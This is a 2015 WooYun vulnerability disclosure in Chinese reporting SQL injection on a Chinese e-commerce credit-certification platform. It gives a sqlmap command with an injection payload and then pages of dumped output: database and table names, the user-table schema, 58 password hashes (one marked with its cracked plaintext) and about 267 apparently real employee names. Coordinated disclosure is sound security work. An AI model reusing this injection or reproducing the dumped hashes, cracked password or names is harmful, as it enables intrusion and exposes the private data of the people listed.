当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0145020
漏洞标题:
中国电子商务信用认证平台SQL注射/大量信息泄露
相关厂商:
中国电子商务信用认证平台
漏洞作者:
冷白开。
提交时间:
2015-10-06 15:48
修复时间:
2015-11-26 10:56
公开时间:
2015-11-26 10:56
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

中国电子商务信用认证平台SQL注射/大量信息泄露

详细说明:

射点sqlmap.py -u "https://**.**.**.**//entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d6%20AND%20204%3d204" --dbs

1.png

影响19个库

available databases [19]:
[*] accesslog
[*] company
[*] cxt
[*] cxt_cert
[*] dede53
[*] information_schema
[*] joyinweb
[*] mysql
[*] performance_schema
[*] phpcms
[*] phpmyvisites
[*] piwik
[*] rdfocus
[*] szfw2
[*] szfw2_call
[*] test
[*] textpattern
[*] tikiwiki
[*] typecho
Database: szfw2
[140 tables]
+---------------------------------------+
| agent_map                             |
| am_agent                              |
| am_agent_contact                      |
| am_agent_in_out_sea_his               |
| am_agent_log                          |
| am_agent_move                         |
| am_agent_pact                         |
| am_agent_permit                       |
| am_agent_share                        |
| am_agent_share_checklog               |
| am_agent_source                       |
| am_agentcheck_log                     |
| am_agentpact_checklog                 |
| am_expect_charge                      |
| am_expect_charge_history              |
| am_last_contact                       |
| am_pact_cashdeposit                   |
| am_pact_translog                      |
| am_quarterly_task                     |
| am_visit_acc_check                    |
| am_visit_acc_return                   |
| am_visit_accompany                    |
| am_visit_appoint                      |
| am_visit_note                         |
| am_visit_return                       |
| am_visit_vertify                      |
| am_visit_vertify_item                 |
| cert_company                          |
| cert_domain                           |
| cert_license                          |
| cm_ag_contact                         |
| cm_ag_contact_recode                  |
| cm_customer                           |
| cm_customer_agent                     |
| cm_customer_ex                        |
| cm_customer_log                       |
| cm_customer_move                      |
| cm_customer_permit                    |
| cm_data_config                        |
| cm_intention                          |
| cm_user_move                          |
| com_audit_record                      |
| com_bill_no                           |
| drp_wm_customer                       |
| fm_account_detail_rp                  |
| fm_account_recharge                   |
| fm_agent_account                      |
| fm_agent_account_amount               |
| fm_agent_account_detail               |
| fm_agent_bank                         |
| fm_attachments                        |
| fm_bank_account                       |
| fm_invoice_bill                       |
| fm_invoice_isseu                      |
| fm_invoice_isseu_bill                 |
| fm_invoice_no                         |
| fm_invoice_type                       |
| fm_post_money                         |
| fm_receipt_payment_mode               |
| fm_receivable_pay                     |
| fm_receivable_pay_state               |
| fm_unit_out_money                     |
| hr_abpost                             |
| hr_department                         |
| hr_dept_position                      |
| hr_e_position                         |
| hr_employee                           |
| hr_employee_old                       |
| hr_level                              |
| hr_position                           |
| hr_postion_level                      |
| log_login                             |
| log_operate                           |
| log_webservice                        |
| om_order                              |
| om_order_gift                         |
| om_order_gift_set                     |
| om_order_move_log                     |
| om_order_no                           |
| om_order_recharge                     |
| om_order_website                      |
| rpt_agent_contact_record              |
| rpt_agent_intention_rating            |
| rpt_kpi_base                          |
| sys_account_group                     |
| sys_account_group_user                |
| sys_agent_model                       |
| sys_agent_model_detail                |
| sys_agroup_manager                    |
| sys_agroup_manager_detail             |
| sys_area                              |
| sys_area_group                        |
| sys_area_group_detail                 |
| sys_base_data                         |
| sys_city                              |
| sys_com_setting                       |
| sys_const_data                        |
| sys_data_synchronous                  |
| sys_dev_auto_code                     |
| sys_industry                          |
| sys_intention_rating                  |
| sys_message                           |
| sys_model                             |
| sys_model_group                       |
| sys_model_right                       |
| sys_post_right                        |
| sys_product                           |
| sys_product_price_model               |
| sys_product_type                      |
| sys_province                          |
| sys_role                              |
| sys_role_right                        |
| sys_send_mail                         |
| sys_soap_log                          |
| sys_unit                              |
| sys_unit_salereward_rate_model        |
| sys_unit_salereward_rate_model_detail |
| sys_upload_doc                        |
| sys_user                              |
| sys_user_area                         |
| sys_user_old                          |
| sys_user_right                        |
| sys_user_role                         |
| sys_vacation_days                     |
| sys_zone                              |
| temp_111                              |
| temp_cert_company                     |
| tm_eMail                              |
| tm_net                                |
| tm_net_account                        |
| tm_net_model_manage_user              |
| tm_net_model_manage_user_history      |
| tm_net_verify                         |
| tm_single_info                        |
| tm_trustworthy                        |
| v_am_agent_pact_product               |
| v_am_effect_pact_product              |
| v_channel_manager_area                |
| v_hr_abpost                           |
| v_hr_employee                         |
+---------------------------------------+
Database: szfw2
Table: sys_user
[23 columns]
+-----------------+---------------------+
| Column          | Type                |
+-----------------+---------------------+
| agent_id        | int(5) unsigned     |
| create_time     | timestamp           |
| create_uid      | int(11) unsigned    |
| dept_name       | varchar(16)         |
| e_name          | varchar(8)          |
| e_uid           | int(8) unsigned     |
| finance_no      | varchar(64)         |
| finance_uid     | int(11) unsigned    |
| is_del          | tinyint(3) unsigned |
| is_finance      | tinyint(4)          |
| is_lock         | int(3) unsigned     |
| last_login_time | datetime            |
| login_count     | int(11) unsigned    |
| phone           | varchar(20)         |
| sort_index      | int(11)             |
| tel             | varchar(20)         |
| update_time     | timestamp           |
| update_uid      | int(11) unsigned    |
| user_id         | int(11) unsigned    |
| user_name       | varchar(16)         |
| user_no         | varchar(48)         |
| user_pwd        | varchar(64)         |
| user_remark     | varchar(256)        |
+-----------------+---------------------+
Database: szfw2
Table: sys_user
[58 entries]
+----------------------------------+
| user_pwd                         |
+----------------------------------+
| 0009A9BD7AC397B4A311EAD4280E5C74 |明文:zhouhua
| 001772FBA101EB45699B34F03F57694C |
| 0022671AC060C0E6682B2F91B8332BB9 |
| 00284A6D3ED73DC8D226D53467C1248E |
| 00291AEFD7117592F0858EC119136E60 |
| 00370D5A171DEB215D9C8B1FB51BC130 |
| 004B9B7AC4FC8B9E0412CCA0C9305C46 |
| 004D0A8147789FBDED427352260365C3 |
| 004D8391474EE20E05976A7BFFF1BAFE |
| 004DD1C9C616039C351C94AA7603B8CA |
| 0058AEA7FC8247B394E1C19FCAF05A36 |
| 005B6C065A2D4E4E15F5E8D195553336 |
| 0060CF811B2F26E664DF11352836D521 |
| 0062D21C1A97ACAD0FFF653DF56849B2 |
| 0067E0C6A7736FF2FEB5401C50E40055 |
| 0073F7639030624D23BAA08FA246A49C |
| 0078F94B32371DF125EF18CB4686E01D |
| 008B3B2FCDDBA8455DAD8B3A1B3079B4 |
| 008DBC66A01002D68888DE7B69438955 |
| 009AA9774B5CF730A880956FE6CAAB23 |
| 009B927906B97D1507451F45D795D55E |
| 009B927906B97D1507451F45D795D55E |
| 00A0C18D686BF8C2A0378DA16CCF7B97 |
| 00AA1DFAEB695A7AFA25F4E91EF5F3E7 |
| 00ACA552FD08D98306DB09566C88CF85 |
| 00B66944EEB6E8342A7085AB0B98AB96 |
| 00B89B8EB20AB3009960B8C05F2363AE |
| 00BCB1F530E3FE3F0C46DB712C09312D |
| 00C222E0437A1EFF39FF1B0C27D51953 |
| 00C5745BDF12D4C9C8714D53D5EB4053 |
| 00CF27E392AC1DA17A2A44B2B89AD8B3 |
| 00D38EF89D410F5FEBFB23DDE1D4E6F3 |
| 00DCBE5FADCC2A232E2F68DEDC42ABFB |
| 00DD223C028CEE28C5EF7F82004F4C0F |
| 00E155244F2829C4D08FE62CDC039B50 |
| 00E3170230703BE5AC1CEBC30291723A |
| 00E69BA9AC98F67595DA7AA6C02244D6 |
| 00EDE0A6C4D967AB8EE0E46C8809CC0E |
| 00F398C18CEA1911F58696E43CF85A47 |
| 00F39DCDE9CF1E731344520AB9D2DBA7 |
| 00F65D2EA75BEC0A987CFF849342BF82 |
| 00FEF253C6E3BDE1D3F16C6882760392 |
| 00FF50D1FEDEE1BCDDAFCD96ABC28489 |
| 010394E55922E7D5CF3B2A5585B06AFB |
| 0108CF8B0D9F6FBE9F63BD44766EA313 |
| 010A11C2A6691F8BE77F6519295D20DB |
| 011FE5DB205CD7CF21144AE329A949D3 |
| 01224DAF6A9E29FCEFF81668F4AC589E |
| 0123CADA84714B1273415029FC778C3B |
| 012A0DF605EDC90B7BFB75FFB55F6103 |
| 0138C595E85D5BA9951D9993517FEAB3 |
| 013C9F7DE65AD0C26922D864742F3A7C |
| 01438E10ABB1EA0E7B5514A2E61C2191 |
| 0143B99B04C05979106439B4D4397E8D |
| 01465D7F7019EC7D654997001678AD2A |
| 0146F74685E3EF63992126EB50A44A7D |
| 014D389D1CC652B37FEFA3CADD6D19EF |
| 0156C4B099E489BA4D13DB6BD3EBB2AE |
+----------------------------------+
Database: szfw2
Table: sys_user
[267 entries]
+----------+
| e_name   |
+----------+
[13:36:59] [WARNING] console output will be tri
e table size
| pshz0060 |
| test     |
| test     |
| test     |
| test1    |
| test4    |
| 丁丽珍      |
| 丁于       |
| 丁亚丹      |
| 丁佳伟      |
| 丁兵群      |
| 丁剑波      |
| 丁勇       |
| 丁勰       |
| 丁占英      |
| 丁卫星      |
| 丁垚量      |
| 丁士杰      |
| 丁季多      |
| 丁宁       |
| 丁宏儒      |
| 丁小兵      |
| 丁小波      |
| 丁少远      |
| 丁幸       |
| 丁建强      |
| 丁建潮      |
| 丁彩       |
| 丁怡       |
| 丁慧丽      |
| 丁敏兰      |
| 丁新蕾      |
| 丁旭兰      |
| 丁晓慧      |
| 丁晓飞      |
| 丁柳       |
| 丁柳       |
| 丁根良      |
| 丁梦岚      |
| 丁泽龙      |
| 丁海燕      |
| 丁涛       |
| 丁涛涛      |
| 丁潇潇      |
| 丁玉兰      |
| 丁玉珍      |
| 丁珊珊      |
| 丁碧霞      |
| 丁磊       |
| 丁莉萍      |
| 丁莹       |
| 丁菊       |
| 丁蓉蓉      |
| 丁蕊       |
| 丁超       |
| 丁超颖      |
| 丁达坤      |
| 丁鑫       |
| 丁钱杰      |
| 丁银萍      |
| 丁银银      |
| 丁锟       |
| 丁雨平      |
| 丁颖       |
| 丁颖       |
| 丁飞云      |
| 丁魁       |
| 丁鼎       |
| 万东辉      |
| 万东辉      |
| 万云       |
| 万亚琴      |
| 万佳玲      |
| 万光胜      |
| 万分标      |
| 万勇       |
| 万嘉东      |
| 万娟       |
| 万婷婷      |
| 万平       |
| 万志强      |
| 万忠坤      |
| 万振国      |
| 万敏       |
| 万文婷      |
| 万明佳      |
| 万明辉      |
| 万昱       |
| 万晓寅      |
| 万源       |
| 万玉婷      |
| 万琴       |
| 万真       |
| 万秀东      |
| 万科       |
| 万英宏      |
| 万蓉       |
| 万辉       |
| 万通       |
| 三部管理     |
| 上官建行     |
| 上官艳艳     |
| 丛珊       |
| 东智勇      |
| 严一飞      |
| 严东红      |
| 严丽萍      |
| 严云良      |
| 严伟       |
| 严伟惠      |
| 严佳梦      |
| 严加武      |
| 严勇       |
| 严厚辉      |
| 严叶超      |
| 严国梅      |
| 严国梅      |
| 严坷娣      |
| 严娟娟      |
| 严婕       |
| 严嵩       |
| 严廷豪      |
| 严德胜      |
| 严志强      |
| 严振       |
| 严攀越      |
| 严文龙      |
| 严新       |
| 严晓斌      |
| 严杭鑫      |
| 严林树      |
| 严林盛      |
| 严梦姣      |
| 严江成      |
| 严浩       |
| 严浩浩      |
| 严渭飞      |
| 严玉和      |
| 严琰       |
| 严瑶琴      |
| 严皓       |
| 严科立      |
| 严绍平      |
| 严聪       |
| 严艳儿      |
| 严莉萍      |
| 严跃明      |
| 严鄂平      |
| 严陈静      |
| 中网互赢     |
| 丰亚雅      |
| 丰娟       |
| 丰瑜晴      |
| 丰财       |
| 义乌打印     |
| 乐丽霞      |
| 乐容容      |
| 乐朝阳      |
| 乐淘       |
| 乐玲娜      |
| 乐秋露      |
| 乐超超      |
| 乔南       |
| 乔姗姗      |
| 乔明明      |
| 乔朋       |
| 乔蒙蒙      |
| 乔通卫      |
| 于军海      |
| 于军海      |
| 于利平      |
| 于博       |
| 于婷       |
| 于建军      |
| 于彩虹      |
| 于彬彬      |
| 于振伟      |
| 于敏茜      |
| 于明坤      |
| 于春福      |
| 于春福      |
| 于春艳      |
| 于梦佳      |
| 于欢欢      |
| 于泉       |
| 于洋       |
| 于琦       |
| 于琼伟      |
| 于疆       |
| 于继纲      |
| 于若木      |
| 于萍       |
| 于金霞      |
| 于雪       |
| 于静       |
| 云占锋      |
| 云建新      |
| 亓鑫       |
| 井厚飞      |
| 井睆珊      |
| 井茹       |
| 亢永灿      |
| 仇义娜      |
| 仇志华      |
| 付世龙      |
| 付云云      |
| 付佳倩      |
| 付倩       |
| 付勇       |
| 付勇1      |
| 付博       |
| 付姗姗      |
| 付媛媛      |
| 付小红      |
| 付庆洋      |
| 付徐涛      |
| 付志文      |
| 付恩颂      |
| 付文强      |
| 付文文      |
| 付斌斌      |
| 付晓丽      |
| 付晓廉      |
| 付梅       |
| 付清科      |
| 付爱春      |
| 付玲慧      |
| 付珊珊      |
| 付祎       |
| 付胤       |
| 付芳       |
| 付闪宾      |
| 仝丹丹      |
| 仝琳       |
| 代凤海      |
| 代剑锋      |
| 代婷婷      |
| 代子慧      |
| 代富如      |
| 代晓军      |
| 代晴晴      |
| 代森       |
| 代淑姣      |
| 代玉       |
| 代瑶       |
| 代立龙      |
| 代艳丽      |
| 代路伟      |
| 代路英      |
| 代金苹      |
| 代金苹      |
| 代长均      |
| 代长均      |
| 仰敏       |
| 仲夏斌      |
| 仵州       |
+----------+

很多我都没跑完,因为sqlmap装不下了。。。。。几张过程图贴一下

2.png

有几个电话号码

4.png

一坨密码。。。看着都头晕

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-12 10:54

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无